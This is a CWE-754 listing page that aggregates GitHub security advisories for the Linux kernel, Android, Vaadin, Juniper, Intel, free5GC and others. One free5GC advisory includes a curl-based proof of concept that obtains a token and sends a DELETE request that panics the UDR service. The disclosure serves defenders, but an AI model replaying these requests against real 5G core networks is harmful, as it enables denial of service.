Common Weakness Enumeration

CWE-754

Allowed-with-Review

Improper Check for Unusual or Exceptional Conditions

Abstraction: Class · Status: Incomplete

The product does not check or incorrectly checks for unusual or exceptional conditions that are not expected to occur frequently during day to day operation of the product.

905 vulnerabilities reference this CWE, most recent first.

GHSA-JH8R-93CX-CRMC

Vulnerability from github – Published: 2022-05-14 01:02 – Updated: 2025-04-20 03:49
VLAI
Details

The Linux Kernel 2.6.32 and later are affected by a denial of service, by flooding the diagnostic port 0x80 an exception can be triggered leading to a kernel panic.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2017-1000407"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-754"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2017-12-11T21:29:00Z",
    "severity": "HIGH"
  },
  "details": "The Linux Kernel 2.6.32 and later are affected by a denial of service, by flooding the diagnostic port 0x80 an exception can be triggered leading to a kernel panic.",
  "id": "GHSA-jh8r-93cx-crmc",
  "modified": "2025-04-20T03:49:47Z",
  "published": "2022-05-14T01:02:41Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2017-1000407"
    },
    {
      "type": "WEB",
      "url": "https://access.redhat.com/errata/RHSA-2018:0676"
    },
    {
      "type": "WEB",
      "url": "https://access.redhat.com/errata/RHSA-2018:1062"
    },
    {
      "type": "WEB",
      "url": "https://access.redhat.com/errata/RHSA-2019:1170"
    },
    {
      "type": "WEB",
      "url": "https://access.redhat.com/security/cve/cve-2017-1000407"
    },
    {
      "type": "WEB",
      "url": "https://lists.debian.org/debian-lts-announce/2017/12/msg00004.html"
    },
    {
      "type": "WEB",
      "url": "https://usn.ubuntu.com/3583-1"
    },
    {
      "type": "WEB",
      "url": "https://usn.ubuntu.com/3583-2"
    },
    {
      "type": "WEB",
      "url": "https://usn.ubuntu.com/3617-1"
    },
    {
      "type": "WEB",
      "url": "https://usn.ubuntu.com/3617-2"
    },
    {
      "type": "WEB",
      "url": "https://usn.ubuntu.com/3619-1"
    },
    {
      "type": "WEB",
      "url": "https://usn.ubuntu.com/3619-2"
    },
    {
      "type": "WEB",
      "url": "https://usn.ubuntu.com/3632-1"
    },
    {
      "type": "WEB",
      "url": "https://www.debian.org/security/2017/dsa-4073"
    },
    {
      "type": "WEB",
      "url": "https://www.debian.org/security/2018/dsa-4082"
    },
    {
      "type": "WEB",
      "url": "https://www.spinics.net/lists/kvm/msg159809.html"
    },
    {
      "type": "WEB",
      "url": "http://www.openwall.com/lists/oss-security/2017/12/04/2"
    },
    {
      "type": "WEB",
      "url": "http://www.securityfocus.com/bid/102038"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.0/AV:A/AC:L/PR:N/UI:N/S:C/C:N/I:N/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-JMWV-XWW6-6HCV

Vulnerability from github – Published: 2023-07-13 00:30 – Updated: 2024-04-04 06:05
VLAI
Details

In ShortcutInfo of ShortcutInfo.java, there is a possible way for an app to retain notification listening access due to an uncaught exception. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2023-21246"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-273",
      "CWE-754"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2023-07-13T00:15:23Z",
    "severity": "LOW"
  },
  "details": "In ShortcutInfo of ShortcutInfo.java, there is a possible way for an app to retain notification listening access due to an uncaught exception. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.\n\n",
  "id": "GHSA-jmwv-xww6-6hcv",
  "modified": "2024-04-04T06:05:20Z",
  "published": "2023-07-13T00:30:32Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-21246"
    },
    {
      "type": "WEB",
      "url": "https://android.googlesource.com/platform/frameworks/base/+/fc1b9998ca8a9fceba47d67fd9ea9b45705b53e0"
    },
    {
      "type": "WEB",
      "url": "https://source.android.com/security/bulletin/2023-07-01"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-JMX8-355M-8VWH

Vulnerability from github – Published: 2021-04-19 14:53 – Updated: 2021-04-16 23:18
VLAI
Summary
Unauthorized client-side property update in UIDL request handler in Vaadin 10 and 11
Details

Missing check in UIDL request handler in com.vaadin:flow-server versions 1.0.0 through 1.0.5 (Vaadin 10.0.0 through 10.0.7, and 11.0.0 through 11.0.2) allows attacker to update element property values via crafted synchronization message.

  • https://vaadin.com/security/cve-2018-25007
Show details on source website

{
  "affected": [
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 1.0.5"
      },
      "package": {
        "ecosystem": "Maven",
        "name": "com.vaadin:flow-server"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "1.0.0"
            },
            {
              "fixed": "1.0.6"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2018-25007"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-754"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2021-04-16T23:18:28Z",
    "nvd_published_at": "2021-04-23T16:15:00Z",
    "severity": "LOW"
  },
  "details": "Missing check in UIDL request handler in com.vaadin:flow-server versions 1.0.0 through 1.0.5 (Vaadin 10.0.0 through 10.0.7, and 11.0.0 through 11.0.2) allows attacker to update element property values via crafted synchronization message.\n\n- https://vaadin.com/security/cve-2018-25007",
  "id": "GHSA-jmx8-355m-8vwh",
  "modified": "2021-04-16T23:18:28Z",
  "published": "2021-04-19T14:53:09Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/vaadin/flow/security/advisories/GHSA-jmx8-355m-8vwh"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2018-25007"
    },
    {
      "type": "WEB",
      "url": "https://github.com/vaadin/flow/pull/4774"
    },
    {
      "type": "WEB",
      "url": "https://vaadin.com/security/cve-2018-25007"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:U/C:N/I:L/A:N",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Unauthorized client-side property update in UIDL request handler in Vaadin 10 and 11"
}

GHSA-JP8P-MV2J-QXC2

Vulnerability from github – Published: 2023-04-19 09:30 – Updated: 2024-04-04 03:35
VLAI
Details

A CWE-754: Improper Check for Unusual or Exceptional Conditions vulnerability exists that could cause denial of service of the controller when a malicious project file is loaded onto the controller by an authenticated user.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2023-25620"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-754"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2023-04-19T09:15:07Z",
    "severity": "MODERATE"
  },
  "details": "\n\n\nA CWE-754: Improper Check for Unusual or Exceptional Conditions vulnerability exists that\ncould cause denial of service of the controller when a malicious project file is loaded onto the\ncontroller by an authenticated user. \n\n \n\n",
  "id": "GHSA-jp8p-mv2j-qxc2",
  "modified": "2024-04-04T03:35:01Z",
  "published": "2023-04-19T09:30:17Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-25620"
    },
    {
      "type": "WEB",
      "url": "https://download.schneider-electric.com/files?p_Doc_Ref=SEVD-2023-101-05\u0026p_enDocType=Security+and+Safety+Notice\u0026p_File_Name=SEVD-2023-101-05.pdf"
    },
    {
      "type": "WEB",
      "url": "https://https://download.schneider-electric.com/files?p_Doc_Ref=SEVD-2023-101-05\u0026p_enDocType=Security+and+Safety+Notice\u0026p_File_Name=SEVD-2023-101-05.pdf"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-JQ9H-7VHV-WHC7

Vulnerability from github – Published: 2022-05-24 19:08 – Updated: 2022-05-24 19:08
VLAI
Details

A vulnerability in the handling of exceptional conditions in Juniper Networks Junos OS Evolved (EVO) allows an attacker to send specially crafted packets to the device, causing the Advanced Forwarding Toolkit manager (evo-aftmand-bt or evo-aftmand-zx) process to crash and restart, impacting all traffic going through the FPC, resulting in a Denial of Service (DoS). Continued receipt and processing of these packets will create a sustained Denial of Service (DoS) condition. Following messages will be logged prior to the crash: Feb 2 10:14:39 fpc0 evo-aftmand-bt[16263]: [Error] Nexthop: Failed to get fwd nexthop for nexthop:32710470974358 label:1089551617 for session:18 probe:35 Feb 2 10:14:39 fpc0 evo-aftmand-bt[16263]: [Error] Nexthop: Failed to get fwd nexthop for nexthop:19241453497049 label:1089551617 for session:18 probe:37 Feb 2 10:14:39 fpc0 evo-aftmand-bt[16263]: [Error] Nexthop: Failed to get fwd nexthop for nexthop:19241453497049 label:1089551617 for session:18 probe:44 Feb 2 10:14:39 fpc0 evo-aftmand-bt[16263]: [Error] Nexthop: Failed to get fwd nexthop for nexthop:32710470974358 label:1089551617 for session:18 probe:47 Feb 2 10:14:39 fpc0 audit[16263]: ANOM_ABEND auid=4294967295 uid=0 gid=0 ses=4294967295 pid=16263 comm="EvoAftManBt-mai" exe="/usr/sbin/evo-aftmand-bt" sig=11 Feb 2 10:14:39 fpc0 kernel: audit: type=1701 audit(1612260879.272:17): auid=4294967295 uid=0 gid=0 ses=4294967295 pid=16263 comm="EvoAftManBt-mai" exe="/usr/sbin/evo-aftmand-bt" sig=1 This issue affects Juniper Networks Junos OS Evolved: All versions prior to 20.4R2-EVO; 21.1 versions prior to 21.1R2-EVO.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2021-0286"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-754"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2021-07-15T20:15:00Z",
    "severity": "HIGH"
  },
  "details": "A vulnerability in the handling of exceptional conditions in Juniper Networks Junos OS Evolved (EVO) allows an attacker to send specially crafted packets to the device, causing the Advanced Forwarding Toolkit manager (evo-aftmand-bt or evo-aftmand-zx) process to crash and restart, impacting all traffic going through the FPC, resulting in a Denial of Service (DoS). Continued receipt and processing of these packets will create a sustained Denial of Service (DoS) condition. Following messages will be logged prior to the crash: Feb 2 10:14:39 fpc0 evo-aftmand-bt[16263]: [Error] Nexthop: Failed to get fwd nexthop for nexthop:32710470974358 label:1089551617 for session:18 probe:35 Feb 2 10:14:39 fpc0 evo-aftmand-bt[16263]: [Error] Nexthop: Failed to get fwd nexthop for nexthop:19241453497049 label:1089551617 for session:18 probe:37 Feb 2 10:14:39 fpc0 evo-aftmand-bt[16263]: [Error] Nexthop: Failed to get fwd nexthop for nexthop:19241453497049 label:1089551617 for session:18 probe:44 Feb 2 10:14:39 fpc0 evo-aftmand-bt[16263]: [Error] Nexthop: Failed to get fwd nexthop for nexthop:32710470974358 label:1089551617 for session:18 probe:47 Feb 2 10:14:39 fpc0 audit[16263]: ANOM_ABEND auid=4294967295 uid=0 gid=0 ses=4294967295 pid=16263 comm=\"EvoAftManBt-mai\" exe=\"/usr/sbin/evo-aftmand-bt\" sig=11 Feb 2 10:14:39 fpc0 kernel: audit: type=1701 audit(1612260879.272:17): auid=4294967295 uid=0 gid=0 ses=4294967295 pid=16263 comm=\"EvoAftManBt-mai\" exe=\"/usr/sbin/evo-aftmand-bt\" sig=1 This issue affects Juniper Networks Junos OS Evolved: All versions prior to 20.4R2-EVO; 21.1 versions prior to 21.1R2-EVO.",
  "id": "GHSA-jq9h-7vhv-whc7",
  "modified": "2022-05-24T19:08:07Z",
  "published": "2022-05-24T19:08:07Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-0286"
    },
    {
      "type": "WEB",
      "url": "https://kb.juniper.net/JSA11188"
    }
  ],
  "schema_version": "1.4.0",
  "severity": []
}

GHSA-JQFC-GWJ5-3W63

Vulnerability from github – Published: 2026-05-08 22:52 – Updated: 2026-06-08 23:48
VLAI
Summary
free5GC's UDR nudr-dr DELETE amf-subscriptions panics on missing UE state via nil interface type assertion (single authenticated request)
Details

Summary

free5GC's UDR nudr-dr DELETE /subscription-data/{ueId}/{servingPlmnId}/ee-subscriptions/{subsId}/amf-subscriptions handler panics on a single authenticated request against a fresh UDR instance when the supplied ueId does not exist in UESubsCollection. The processor checks value, ok := udrSelf.UESubsCollection.Load(ueId) and sets a 404 USER_NOT_FOUND problem-details on the miss path, but execution continues and immediately runs value.(*udr_context.UESubsData) -- a Go type assertion on a nil interface, which panics with interface conversion: interface {} is nil, not *context.UESubsData. Gin recovery converts the panic into HTTP 500, but the endpoint remains repeatedly panicable.

This is the no-precondition sibling of free5gc/free5gc#919: same handler, same bug pattern (set pd, do not return, then dereference), but the panic site is the nil-interface type assertion at line 61 instead of the nil-pointer deref at line 69. No earlier EE-subscription create is required.

This endpoint requires a valid nudr-dr OAuth2 access token (PR:L, NOT PR:N), so this is scored as an authenticated panic-DoS, not as an unauth-bypass finding.

Details

Validated against the UDR container in the official Docker compose lab. - Source repo tag: v4.2.1 - Running Docker image: free5gc/udr:v4.2.1 - Runtime UDR commit: 754d23b0 - Docker validation date: 2026-03-22 - UDR endpoint: http://10.100.200.11:8000

Vulnerable handler (the ok miss path sets pd but does not return; the next line type-asserts the nil interface):

subsId := c.Params.ByName("subsId")
s.Processor().RemoveAmfSubscriptionsInfoProcedure(c, subsId, ueId)

In the processor:

value, ok := udrSelf.UESubsCollection.Load(ueId)
if !ok {
    pd = util.ProblemDetailsNotFound("USER_NOT_FOUND")
}

UESubsData := value.(*udr_context.UESubsData)   // panics: nil interface

When ueId is absent from UESubsCollection, value is the nil interface{} returned by sync.Map.Load, and value.(*udr_context.UESubsData) panics with:

panic: interface conversion: interface {} is nil, not *context.UESubsData

Code evidence (paths in free5gc/udr): - Route exposure + handler dispatch: - NFs/udr/internal/sbi/api_datarepository.go:2161 - NFs/udr/internal/sbi/api_datarepository.go:2170 - NFs/udr/internal/sbi/api_datarepository.go:2172 - Panic root cause (nil interface type assertion): - NFs/udr/internal/sbi/processor/event_amf_subscription_info_document.go:53 - NFs/udr/internal/sbi/processor/event_amf_subscription_info_document.go:56 - NFs/udr/internal/sbi/processor/event_amf_subscription_info_document.go:61

PoC

Reproduced end-to-end against the running UDR at http://10.100.200.11:8000 -- single authenticated request, no preconditions.

  1. Restart UDR (clean state -- proves no precondition is needed):
docker restart udr
  1. Obtain a valid nudr-dr token from NRF:
curl -sS -X POST 'http://10.100.200.3:8000/oauth2/token' \
  -H 'Content-Type: application/x-www-form-urlencoded' \
  --data 'grant_type=client_credentials&nfType=NEF&nfInstanceId=eb9990de-4cd3-41b0-b5d9-c2102b088c57&targetNfType=UDR&scope=nudr-dr'
  1. Trigger the panic with one DELETE for a nonexistent ueId=x:
curl -i -sS -X DELETE \
  'http://10.100.200.11:8000/nudr-dr/v2/subscription-data/x/bad/ee-subscriptions/x/amf-subscriptions' \
  -H 'Authorization: Bearer <valid_nudr_dr_jwt>'
HTTP/1.1 500 Internal Server Error
Content-Length: 0
  1. UDR container logs (docker logs udr) confirm the nil-interface conversion panic at event_amf_subscription_info_document.go:61 inside RemoveAmfSubscriptionsInfoProcedure:
[ERRO][UDR][GIN] panic: interface conversion: interface {} is nil, not *context.UESubsData
github.com/free5gc/udr/internal/sbi/processor.(*Processor).RemoveAmfSubscriptionsInfoProcedure
    .../event_amf_subscription_info_document.go:61
github.com/free5gc/udr/internal/sbi.(*Server).HandleRemoveAmfSubscriptionsInfo
    .../api_datarepository.go:2172
[INFO][UDR][GIN] | 500 | DELETE | /nudr-dr/v2/subscription-data/x/bad/ee-subscriptions/x/amf-subscriptions |

Impact

Incorrect type conversion on a nil interface (CWE-704) inside an authenticated UDR data-repository handler, caused by improper handling of the missing-ueId branch (CWE-754): the handler sets a 404 problem-details value but does not return, then runs a Go type assertion on the nil interface returned by sync.Map.Load.

This is NOT framed as an auth-bypass finding: the endpoint requires a valid nudr-dr OAuth2 access token. A network attacker who already holds (or can obtain) a valid token can: - Trigger a reliable, single-request panic on the amf-subscriptions delete route against a fresh UDR (no preparatory state needed -- this is strictly easier than free5gc/free5gc#919). - Repeat the trigger to sustain a per-request panic-DoS on UDR's data-repository surface, with each panic costing more CPU + log writes than the intended 404 USER_NOT_FOUND response would have.

No Confidentiality impact (the response is 500 with empty body). No Integrity impact (the panic happens before any state mutation). Availability impact is limited to per-request degradation (Gin recovers; the UDR process keeps running).

Affected: free5gc v4.2.1.

Upstream issue: https://github.com/free5gc/free5gc/issues/920 Upstream fix: https://github.com/free5gc/udr/pull/60

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "Go",
        "name": "github.com/free5gc/udr"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "1.4.3"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-44324"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-704",
      "CWE-754"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-05-08T22:52:20Z",
    "nvd_published_at": "2026-05-27T17:16:37Z",
    "severity": "MODERATE"
  },
  "details": "### Summary\nfree5GC\u0027s UDR `nudr-dr` `DELETE /subscription-data/{ueId}/{servingPlmnId}/ee-subscriptions/{subsId}/amf-subscriptions` handler panics on a single authenticated request against a fresh UDR instance when the supplied `ueId` does not exist in `UESubsCollection`. The processor checks `value, ok := udrSelf.UESubsCollection.Load(ueId)` and sets a `404 USER_NOT_FOUND` problem-details on the miss path, but execution continues and immediately runs `value.(*udr_context.UESubsData)` -- a Go type assertion on a nil interface, which panics with `interface conversion: interface {} is nil, not *context.UESubsData`. Gin recovery converts the panic into `HTTP 500`, but the endpoint remains repeatedly panicable.\n\nThis is the no-precondition sibling of free5gc/free5gc#919: same handler, same bug pattern (set `pd`, do not return, then dereference), but the panic site is the nil-interface type assertion at line 61 instead of the nil-pointer deref at line 69. No earlier EE-subscription create is required.\n\nThis endpoint requires a valid `nudr-dr` OAuth2 access token (PR:L, NOT PR:N), so this is scored as an authenticated panic-DoS, not as an unauth-bypass finding.\n\n### Details\nValidated against the UDR container in the official Docker compose lab.\n- Source repo tag: `v4.2.1`\n- Running Docker image: `free5gc/udr:v4.2.1`\n- Runtime UDR commit: `754d23b0`\n- Docker validation date: 2026-03-22\n- UDR endpoint: `http://10.100.200.11:8000`\n\nVulnerable handler (the `ok` miss path sets `pd` but does not return; the next line type-asserts the nil interface):\n```go\nsubsId := c.Params.ByName(\"subsId\")\ns.Processor().RemoveAmfSubscriptionsInfoProcedure(c, subsId, ueId)\n```\nIn the processor:\n```go\nvalue, ok := udrSelf.UESubsCollection.Load(ueId)\nif !ok {\n    pd = util.ProblemDetailsNotFound(\"USER_NOT_FOUND\")\n}\n\nUESubsData := value.(*udr_context.UESubsData)   // panics: nil interface\n```\nWhen `ueId` is absent from `UESubsCollection`, `value` is the nil `interface{}` returned by `sync.Map.Load`, and `value.(*udr_context.UESubsData)` panics with:\n```\npanic: interface conversion: interface {} is nil, not *context.UESubsData\n```\n\nCode evidence (paths in `free5gc/udr`):\n- Route exposure + handler dispatch:\n  - `NFs/udr/internal/sbi/api_datarepository.go:2161`\n  - `NFs/udr/internal/sbi/api_datarepository.go:2170`\n  - `NFs/udr/internal/sbi/api_datarepository.go:2172`\n- Panic root cause (nil interface type assertion):\n  - `NFs/udr/internal/sbi/processor/event_amf_subscription_info_document.go:53`\n  - `NFs/udr/internal/sbi/processor/event_amf_subscription_info_document.go:56`\n  - `NFs/udr/internal/sbi/processor/event_amf_subscription_info_document.go:61`\n\n### PoC\nReproduced end-to-end against the running UDR at `http://10.100.200.11:8000` -- single authenticated request, no preconditions.\n\n1. Restart UDR (clean state -- proves no precondition is needed):\n```\ndocker restart udr\n```\n\n2. Obtain a valid `nudr-dr` token from NRF:\n```\ncurl -sS -X POST \u0027http://10.100.200.3:8000/oauth2/token\u0027 \\\n  -H \u0027Content-Type: application/x-www-form-urlencoded\u0027 \\\n  --data \u0027grant_type=client_credentials\u0026nfType=NEF\u0026nfInstanceId=eb9990de-4cd3-41b0-b5d9-c2102b088c57\u0026targetNfType=UDR\u0026scope=nudr-dr\u0027\n```\n\n3. Trigger the panic with one DELETE for a nonexistent `ueId=x`:\n```\ncurl -i -sS -X DELETE \\\n  \u0027http://10.100.200.11:8000/nudr-dr/v2/subscription-data/x/bad/ee-subscriptions/x/amf-subscriptions\u0027 \\\n  -H \u0027Authorization: Bearer \u003cvalid_nudr_dr_jwt\u003e\u0027\n```\n```\nHTTP/1.1 500 Internal Server Error\nContent-Length: 0\n```\n\n4. UDR container logs (`docker logs udr`) confirm the nil-interface conversion panic at `event_amf_subscription_info_document.go:61` inside `RemoveAmfSubscriptionsInfoProcedure`:\n```\n[ERRO][UDR][GIN] panic: interface conversion: interface {} is nil, not *context.UESubsData\ngithub.com/free5gc/udr/internal/sbi/processor.(*Processor).RemoveAmfSubscriptionsInfoProcedure\n    .../event_amf_subscription_info_document.go:61\ngithub.com/free5gc/udr/internal/sbi.(*Server).HandleRemoveAmfSubscriptionsInfo\n    .../api_datarepository.go:2172\n[INFO][UDR][GIN] | 500 | DELETE | /nudr-dr/v2/subscription-data/x/bad/ee-subscriptions/x/amf-subscriptions |\n```\n\n### Impact\nIncorrect type conversion on a nil interface (CWE-704) inside an authenticated UDR data-repository handler, caused by improper handling of the missing-ueId branch (CWE-754): the handler sets a `404` problem-details value but does not return, then runs a Go type assertion on the nil interface returned by `sync.Map.Load`.\n\nThis is NOT framed as an auth-bypass finding: the endpoint requires a valid `nudr-dr` OAuth2 access token. A network attacker who already holds (or can obtain) a valid token can:\n- Trigger a reliable, single-request panic on the `amf-subscriptions` delete route against a fresh UDR (no preparatory state needed -- this is strictly easier than free5gc/free5gc#919).\n- Repeat the trigger to sustain a per-request panic-DoS on UDR\u0027s data-repository surface, with each panic costing more CPU + log writes than the intended `404 USER_NOT_FOUND` response would have.\n\nNo Confidentiality impact (the response is `500` with empty body). No Integrity impact (the panic happens before any state mutation). Availability impact is limited to per-request degradation (Gin recovers; the UDR process keeps running).\n\nAffected: free5gc v4.2.1.\n\nUpstream issue: https://github.com/free5gc/free5gc/issues/920\nUpstream fix: https://github.com/free5gc/udr/pull/60",
  "id": "GHSA-jqfc-gwj5-3w63",
  "modified": "2026-06-08T23:48:08Z",
  "published": "2026-05-08T22:52:20Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/free5gc/free5gc/security/advisories/GHSA-jqfc-gwj5-3w63"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-44324"
    },
    {
      "type": "WEB",
      "url": "https://github.com/free5gc/free5gc/issues/920"
    },
    {
      "type": "WEB",
      "url": "https://github.com/free5gc/udr/pull/60"
    },
    {
      "type": "WEB",
      "url": "https://github.com/free5gc/udr/commit/8a1d3c63be99d378806d771f086ff32f1867da99"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/free5gc/free5gc"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
      "type": "CVSS_V3"
    }
  ],
  "summary": "free5GC\u0027s UDR nudr-dr DELETE amf-subscriptions panics on missing UE state via nil interface type assertion (single authenticated request)"
}

GHSA-JRVR-GM38-G3H7

Vulnerability from github – Published: 2022-05-24 17:42 – Updated: 2022-05-24 17:42
VLAI
Details

Improper conditions check in some Intel(R) Graphics Drivers before versions 26.20.100.8141, 15.45.32.5145 and 15.40.46.5144 may allow an authenticated user to potentially enable escalation of privilege via local access.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2020-24450"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-754"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2021-02-17T14:15:00Z",
    "severity": "HIGH"
  },
  "details": "Improper conditions check in some Intel(R) Graphics Drivers before versions 26.20.100.8141, 15.45.32.5145 and 15.40.46.5144 may allow an authenticated user to potentially enable escalation of privilege via local access.",
  "id": "GHSA-jrvr-gm38-g3h7",
  "modified": "2022-05-24T17:42:27Z",
  "published": "2022-05-24T17:42:27Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-24450"
    },
    {
      "type": "WEB",
      "url": "https://www.intel.com/content/www/us/en/security-center/advisory/intel-sa-00438.html"
    }
  ],
  "schema_version": "1.4.0",
  "severity": []
}

GHSA-JVXQ-MJ7W-PQW7

Vulnerability from github – Published: 2022-05-14 01:14 – Updated: 2022-05-14 01:14
VLAI
Details

FastStone Image Viewer 6.5 has an Exception Handler Chain Corrupted issue starting at image00400000+0x00000000003ef68a via a crafted image file.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2018-15815"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-754"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2019-03-26T20:29:00Z",
    "severity": "MODERATE"
  },
  "details": "FastStone Image Viewer 6.5 has an Exception Handler Chain Corrupted issue starting at image00400000+0x00000000003ef68a via a crafted image file.",
  "id": "GHSA-jvxq-mj7w-pqw7",
  "modified": "2022-05-14T01:14:56Z",
  "published": "2022-05-14T01:14:56Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2018-15815"
    },
    {
      "type": "WEB",
      "url": "https://0x00crashes.blogspot.com/2018/08/faststone-image-viewer-65-few-crashes.html"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-JW9R-R4MJ-MPXX

Vulnerability from github – Published: 2022-05-24 16:46 – Updated: 2024-04-04 00:49
VLAI
Details

An unhandled exception vulnerability exists during Google Sign-In with Google API C++ Client before 2019-04-10. It potentially causes an outage of third-party services that were not designed to recover from exceptions. On the client, ID token handling can cause an unhandled exception because of misinterpretation of an integer as a string, resulting in denial-of-service and then other users can no longer login/sign-in to the affected third-party service. Once this third-party service uses Google Sign-In with google-api-cpp-client, a malicious user can trigger this client/auth/oauth2_authorization.cc vulnerability by requesting the client to receive the ID token from a Google authentication server.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2018-20840"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-754"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2019-05-30T16:29:00Z",
    "severity": "HIGH"
  },
  "details": "An unhandled exception vulnerability exists during Google Sign-In with Google API C++ Client before 2019-04-10. It potentially causes an outage of third-party services that were not designed to recover from exceptions. On the client, ID token handling can cause an unhandled exception because of misinterpretation of an integer as a string, resulting in denial-of-service and then other users can no longer login/sign-in to the affected third-party service. Once this third-party service uses Google Sign-In with google-api-cpp-client, a malicious user can trigger this client/auth/oauth2_authorization.cc vulnerability by requesting the client to receive the ID token from a Google authentication server.",
  "id": "GHSA-jw9r-r4mj-mpxx",
  "modified": "2024-04-04T00:49:52Z",
  "published": "2022-05-24T16:46:53Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2018-20840"
    },
    {
      "type": "WEB",
      "url": "https://github.com/google/google-api-cpp-client/issues/57"
    },
    {
      "type": "WEB",
      "url": "https://github.com/google/google-api-cpp-client/pull/58"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:N/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-JWCH-W7WH-GQJM

Vulnerability from github – Published: 2026-04-21 19:05 – Updated: 2026-04-24 21:11
VLAI
Summary
free5GC UDR: Fail-open handling in PolicyDataSubsToNotifyPost allows unintended subscription creation
Details

Summary

A fail-open request handling flaw in the UDR service causes the /nudr-dr/v2/policy-data/subs-to-notify POST handler to continue processing requests even after request body retrieval or deserialization errors.

This may allow unintended creation of Policy Data notification subscriptions with invalid, empty, or partially processed input, depending on downstream processor behavior.

Details

The endpoint POST /nudr-dr/v2/policy-data/subs-to-notify is intended to create a Policy Data notification subscription only after the HTTP request body has been successfully read and parsed into a valid PolicyDataSubscription object. [file:93]

In the free5GC UDR implementation, the function HandlePolicyDataSubsToNotifyPost in NFs/udr/internal/sbi/api_datarepository.go does not terminate execution after input-processing failures. [file:93]

The request flow is:

  1. The handler calls c.GetRawData() to read the HTTP request body. [file:93]
  2. If GetRawData() fails, the handler sends an HTTP 500 error response, but does not return. [file:93]
  3. The handler then calls openapi.Deserialize(policyDataSubscription, reqBody, "application/json"). [file:93]
  4. If deserialization fails, the handler sends an HTTP 400 error response, but again does not return. [file:93]
  5. Execution continues and the handler still invokes s.Processor().PolicyDataSubsToNotifyPostProcedure(c,policyDataSubscription). [file:93]

As a result, the endpoint operates in a fail-open manner: request processing may continue after fatal input validation or body handling errors, instead of being safely aborted. [file:93]

This differs from safer handlers in the same file, which use a helper pattern that explicitly returns on body read or deserialization failure before calling the corresponding processor routine. [file:93]

Security Impact

This issue affects a write-capable API that creates Policy Data notification subscriptions. [file:93]
